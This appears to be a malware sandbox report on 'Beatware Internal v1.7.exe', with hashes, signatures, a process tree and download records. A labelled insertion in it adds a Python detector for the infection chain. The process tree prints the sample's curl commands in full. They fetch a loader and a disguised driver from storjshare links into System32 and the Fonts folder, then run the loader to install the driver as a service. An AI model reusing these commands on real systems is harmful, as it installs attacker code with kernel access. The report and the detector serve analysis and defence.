Analysis
- max time kernel: 73s
- max time network: 69s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10/05/2024, 23:15
Behavioral tasks
- behavioral1: sample Beatware Internal v1.7.exe, resource win7-20240215-en
- behavioral2: sample Beatware Internal v1.7.exe, resource win10v2004-20240508-en (the resource the analysis above and the signatures below refer to)
General
- Target: Beatware Internal v1.7.exe
- Size: 8.3MB
- MD5: 1fbd8db9291a9ee4622ee2accc493ba0
- SHA1: 66cdda6c2789202f6c5f92a4e9bb970f3e095a9d
- SHA256: 9fffea08116948a80151baf5271b5ba94d54e11d4c9aa7315591626d11ac0242
- SHA512: 744f62ebc60cbe7c9f23c64e5e98c5309b673a8ff2b6c743bc4c27655efcdb43ea68474d6f39160adf74baf65c5036f8ea17b73038fb6ddd04698b5b1cdcccc5
- SSDEEP: 98304:mn2ihaZdUjS6fzR1vQ6cbrgsihQ4xbNs8kwzXRuLHJD1UQ17VOhKMVtOwwMltcc:O2i0IV7RtQhihDbNs8VRORSQsKM3Hwf
Malware Config

Signatures
- Downloads MZ/PE file
- Sets service image path in registry (2 TTPs, 1 IoC)
    Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lntYyeTrEfNahTUmehqQzIIO\ImagePath = "\??\C:\Users\Admin\AppData\Local\Temp\lntYyeTrEfNahTUmehqQzIIO"  (process: gainlol.exe)
- Executes dropped EXE (1 IoC)
    PID 3312 gainlol.exe
- YARA rule match: vmprotect (2 IoCs)
    behavioral2/memory/2368-1-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp  vmprotect
    behavioral2/memory/2368-174-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp  vmprotect
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
    flow 37 discord.com; flow 38 discord.com
- Drops file in System32 directory (2 IoCs)
    File created C:\Windows\System32\gainlol.exe  (process: curl.exe)
    File created C:\Windows\System32\internal.dll  (process: curl.exe)
- Suspicious use of NtSetInformationThreadHideFromDebugger (64 IoCs)
    all 64 from PID 2368 Beatware Internal v1.7.exe
- Drops file in Windows directory (1 IoC)
    File created C:\Windows\Fonts\arial.sys  (process: curl.exe)
- Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
- Enumerates system info in registry (2 TTPs, 3 IoCs)
    Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  (process: msedge.exe)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  (process: msedge.exe)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  (process: msedge.exe)
- Modifies registry class (1 IoC)
    Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1337824034-2731376981-3755436523-1000\{667DCD50-3ED8-4FFB-A819-014180711166}  (process: msedge.exe)
- Suspicious behavior: EnumeratesProcesses (46 IoCs)
    PID 2368 Beatware Internal v1.7.exe (the bulk of the entries); PID 3772 msedge.exe, PID 1664 msedge.exe, PID 3684 msedge.exe and PID 2452 identity_helper.exe (2 entries each)
- Suspicious behavior: LoadsDriver (1 IoC)
    PID 3312 gainlol.exe
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (8 IoCs)
    all 8 from PID 1664 msedge.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
    Token: SeLoadDriverPrivilege, PID 3312 gainlol.exe
- Suspicious use of FindShellTrayWindow (25 IoCs)
    all 25 from PID 1664 msedge.exe
- Suspicious use of SendNotifyMessage (24 IoCs)
    all 24 from PID 1664 msedge.exe
- Suspicious use of WriteProcessMemory (64 IoCs; each parent/child pairing is recorded more than once, the target id in parentheses is the report's own process record number)
    PID 2368 Beatware Internal v1.7.exe wrote to memory of 2372 (84), 3188 (86), 1524 (93), 1664 (94), 3888 (95)
    PID 3188 cmd.exe wrote to memory of 552 (87), 2800 (88), 1252 (89)
    PID 1664 msedge.exe wrote to memory of 3216 (96), 1976 (97), 3772 (98), 1928 (99)
Processes
C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe (PID 2368)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (PID 2372)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 3188)
        cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\certutil.exe (PID 552)
            cmdline: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5

        C:\Windows\system32\find.exe (PID 2800)
            cmdline: find /i /v "md5"

        C:\Windows\system32\find.exe (PID 1252)
            cmdline: find /i /v "certutil"

    C:\Windows\system32\cmd.exe (PID 1524)
        cmdline: C:\Windows\system32\cmd.exe /c cls
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1664)
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord
        - Enumerates system info in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3216)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa756c46f8,0x7ffa756c4708,0x7ffa756c4718

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1976)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3772)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
            - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1928)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3792)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3308)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2796)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4124)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3428)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3684)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4656 /prefetch:8
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 1544)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 2452)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
            - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2720)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2616)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3396)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4748)
            cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
    C:\Windows\system32\cmd.exe (PID 3888)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 4708)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 436)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 3680)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 2312)
        cmdline: C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe >nul 2>&1

        C:\Windows\system32\curl.exe (PID 2648)
            cmdline: curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe
            - Drops file in System32 directory

    C:\Windows\system32\cmd.exe (PID 2508)
        cmdline: C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys >nul 2>&1

        C:\Windows\system32\curl.exe (PID 2468)
            cmdline: curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys
            - Drops file in Windows directory

    C:\Windows\system32\cmd.exe (PID 2912)
        cmdline: C:\Windows\system32\cmd.exe /c C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys

        C:\Windows\System32\gainlol.exe (PID 3312)
            cmdline: C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys
            - Sets service image path in registry
            - Executes dropped EXE
            - Suspicious behavior: LoadsDriver
            - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe (PID 5108)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 1920)
        cmdline: C:\Windows\system32\cmd.exe /c cls

    C:\Windows\system32\cmd.exe (PID 4744)
        cmdline: C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll >nul 2>&1

        C:\Windows\system32\curl.exe (PID 2840)
            cmdline: curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll
            - Drops file in System32 directory

C:\Windows\System32\CompPkgSrv.exe (PID 4760)
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 1568)
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
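The chain in the process tree and signatures above is the part worth detecting: curl.exe fetches a PE into System32 and a .sys into C:\Windows\Fonts under a font-like name, then the dropped gainlol.exe is run with that .sys as its argument, takes SeLoadDriverPrivilege, and registers a service whose ImagePath points into the user's Temp directory. The following is an added example, not part of the tria.ge report or of the sample: a small Python detector run over constructed Sysmon-style events (EID 1 process create, EID 11 file create, EID 13 registry value set) built from the PIDs, paths and service name the report shows. The event field names, the rule names, the elided download URLs and the two benign records (an Edge cache write and a services.exe ACPI entry) are this example's own assumptions.

```python
"""Detect the download -> stage -> load-driver chain from the report above.

Added example, not part of the tria.ge report or of the sample: EVENTS are
constructed Sysmon-style records built from the report's PIDs, paths and
service name; rule names are this example's own, and the last two records
are assumed benign noise that the rules must not flag.
"""
import ntpath
import re

WINDOWS_DIR = "c:\\windows\\"
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
PE_EXT = {".exe", ".dll", ".sys"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
IMAGEPATH_RE = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.I)

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"
CURL = r"C:\Windows\system32\curl.exe"
LOADER = r"C:\Windows\System32\gainlol.exe"
DRIVER = r"C:\Windows\Fonts\arial.sys"

EVENTS = [  # constructed from the report's process tree; download URLs elided as <url>
    {"eid": 1, "pid": 2368, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"eid": 1, "pid": 2648, "ppid": 2312, "image": CURL,
     "cmdline": "curl <url> --output C:/Windows/System32/gainlol.exe"},
    {"eid": 11, "pid": 2648, "image": CURL, "target": LOADER},
    {"eid": 1, "pid": 2468, "ppid": 2508, "image": CURL,
     "cmdline": "curl <url> --output C:/Windows/Fonts/arial.sys"},
    {"eid": 11, "pid": 2468, "image": CURL, "target": DRIVER},
    {"eid": 1, "pid": 3312, "ppid": 2912, "image": LOADER,
     "cmdline": "C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys"},
    {"eid": 13, "pid": 3312, "image": LOADER,
     "target": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lntYyeTrEfNahTUmehqQzIIO\ImagePath",
     "details": r"\??\C:\Users\Admin\AppData\Local\Temp\lntYyeTrEfNahTUmehqQzIIO"},
    {"eid": 11, "pid": 2840, "image": CURL, "target": r"C:\Windows\System32\internal.dll"},
    # assumed benign noise: Edge writing its own cache, services.exe touching a real driver entry
    {"eid": 11, "pid": 1664, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "target": r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index"},
    {"eid": 13, "pid": 700, "image": r"C:\Windows\System32\services.exe",
     "target": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\acpi\ImagePath",
     "details": r"System32\drivers\ACPI.sys"},
]


def norm(path):
    """Lower-case, strip quotes and the NT \\??\\ prefix, unify slashes."""
    p = path.strip().strip('"')
    if p.startswith("\\??\\"):
        p = p[4:]
    return p.replace("/", "\\").lower()


def file_rules(ev):
    # EID 11: a download utility writing a PE under C:\Windows, and any .sys
    # staged outside the drivers directory (here C:\Windows\Fonts\arial.sys)
    if ev["eid"] != 11:
        return []
    t, out = norm(ev["target"]), []
    if (ntpath.basename(norm(ev["image"])) in DOWNLOADERS
            and t.startswith(WINDOWS_DIR) and ntpath.splitext(t)[1] in PE_EXT):
        out.append({"rule": "downloader_writes_pe_under_windows", "pid": ev["pid"], "path": t})
    if ntpath.splitext(t)[1] == ".sys" and not t.startswith(DRIVER_DIR):
        out.append({"rule": "driver_staged_outside_drivers_dir", "pid": ev["pid"], "path": t})
    return out


def registry_rule(ev):
    # EID 13: Services\<name>\ImagePath set to a user-writable location
    if ev["eid"] != 13:
        return []
    m = IMAGEPATH_RE.search(ev["target"])
    if m and USER_WRITABLE.match(norm(ev["details"])):
        return [{"rule": "service_imagepath_user_writable", "pid": ev["pid"],
                 "service": m.group(1), "path": norm(ev["details"])}]
    return []


def correlate_chain(events, findings):
    # One PID ties the stages together: the process that set the ImagePath is
    # itself a dropped PE and was started with a staged .sys on its command line
    dropped = {f["path"] for f in findings if f["rule"] == "downloader_writes_pe_under_windows"}
    staged = {f["path"] for f in findings if f["rule"] == "driver_staged_outside_drivers_dir"}
    launches = {ev["pid"]: ev for ev in events if ev["eid"] == 1}
    chains = []
    for f in findings:
        if f["rule"] != "service_imagepath_user_writable":
            continue
        launch = launches.get(f["pid"])
        if launch is None or norm(launch["image"]) not in dropped:
            continue
        hits = sorted(s for s in staged if s in norm(launch["cmdline"]))
        if hits:
            chains.append({"rule": "driver_load_chain", "pid": f["pid"], "service": f["service"],
                           "loader": norm(launch["image"]), "driver": hits[0]})
    return chains


def detect(events):
    findings = []
    for ev in events:
        findings += file_rules(ev) + registry_rule(ev)
    findings += correlate_chain(events, findings)
    return findings
```

Calling detect(EVENTS) yields the three stage findings for the dropped files, one for the staged .sys, one for the ImagePath write, and a single driver_load_chain finding for PID 3312; the benign Edge and services.exe records produce nothing. The stage rules on their own are noisy on real hosts (installers legitimately write into System32), which is why the correlation keys on one PID being a dropped PE, launched with a staged .sys, and then registering a service outside the drivers directory.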
Network
MITRE ATT&CK Enterprise v15
Downloads
- (path not recorded)
    Filesize: 152B
    MD5: 4158365912175436289496136e7912c2
    SHA1: 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
    SHA256: 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
    SHA512: 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
- (path not recorded)
    Filesize: 152B
    MD5: ce4c898f8fc7601e2fbc252fdadb5115
    SHA1: 01bf06badc5da353e539c7c07527d30dccc55a91
    SHA256: bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
    SHA512: 80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
    Filesize: 840B
    MD5: bca98d1cf3fe8e6f9e3aa8861ec4f2b4
    SHA1: f746415ea8e413db5e07096f4aeb7a14dd78b706
    SHA256: 29054e1b14d297b31776563bf65250c6c6a750c8957f8c94e9368702ea37ed4f
    SHA512: d0124575b26fbae936ccf20aa11a6d14d00d8b0df9e8c20a2a9d1c1bc6750ea1ea34b83deff2c07c571ae11e1c29a58aa05b3948e56ede9279134de367212fd7
- (path not recorded)
    Filesize: 6KB
    MD5: 65c20bdd4eb8f14964b28dfc4d0a6773
    SHA1: 072e35d6c38f81b6bfe03b4c69a251a4c2e691fb
    SHA256: 75191e827aed4adab9c9cffab8af12697001e638e69a165f4913ad2c19f60efe
    SHA512: d0f7a509be8e03918db5a792af1a0ff8440a8b8e007b07ffe6a83fc4293cb981eaf3a3450e06d3ecd9cf19bda879226c5de9e6cf0951e76143497659b1a50228
- (path not recorded)
    Filesize: 6KB
    MD5: a75a306c798be92962313a82e867581e
    SHA1: 608046ba43753fee98e349933fd26c01eb3f28f3
    SHA256: 5a11855473cae7c3149f7655fd4ba3a8675ca38fb81bcba2dfb0bc79bb11e8e2
    SHA512: 4de83eeb0e36b8263ecd1af76798c1aa95bf6cb57e04e827ccfbb93dd6f558340c75e76a93c83b25cb5acca114699ad620a46fb6405bca87e4ce803b19fcf58c
- (path not recorded)
    Filesize: 16B
    MD5: 46295cac801e5d4857d09837238a6394
    SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
    SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
    SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
- (path not recorded)
    Filesize: 16B
    MD5: 206702161f94c5cd39fadd03f4014d98
    SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
    SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
    SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
- (path not recorded)
    Filesize: 11KB
    MD5: 2aa3f89bf8ceae149183ec7b13d3b1c8
    SHA1: 2d79f8ad06aab48d390cd87cdc90ace9b6886a6b
    SHA256: 7d3d3319680d754de02eda14ec16317585e4f2fb86ceaa4c9da99fa23c3c2a9f
    SHA512: 6b5307e5116df523566b85de7337a063579b2c50dd815c7f8d03cc4b298bb56864273e63633937e7b154727d29d578e1dfac2763cbe6c278319fa10a1565aef9
- (path not recorded)
    Filesize: 11KB
    MD5: c352495e5e6d50640db63ac16db2c406
    SHA1: 120422b4ef3e0a5fa97783b370dfe22fe254cf47
    SHA256: d1e121f5e5f3be47248e9973aed3669bc82b161627b3a622e060139098e4a3b6
    SHA512: 7691a97c81ffa63ec4199b5c89c7e2abad237ad17d422d8b040036f548869235651ebcbd75ba132a5fe070504d57c472f097cceee7700fa1bec2b4fbc90f26a8
- (path not recorded)
    Filesize: 27KB
    MD5: 334061e143b54efcbd9e17a51854dc02
    SHA1: 16bd1ab01326758ed4c7b0c7ac19847dc7bd6c58
    SHA256: 90fb91509b573966184a35ca1a23d212fb97fdb67b6a3e6ec881ed1cf5dba474
    SHA512: fb4c7ec8b9a002bc03e3596cde7aa62d07d1e72d2ee587ba6044f6a66c765a1d610a83730589657fc2bdd5cb52521a02d9fdbce6ef92f3f91588775adf18ba72
- (path not recorded)
    Filesize: 112KB
    MD5: e25351a9dd41d1c339530c465fe18569
    SHA1: 2461491598a2ab092b352f2caf375accde6e9d85
    SHA256: d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
    SHA512: 888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1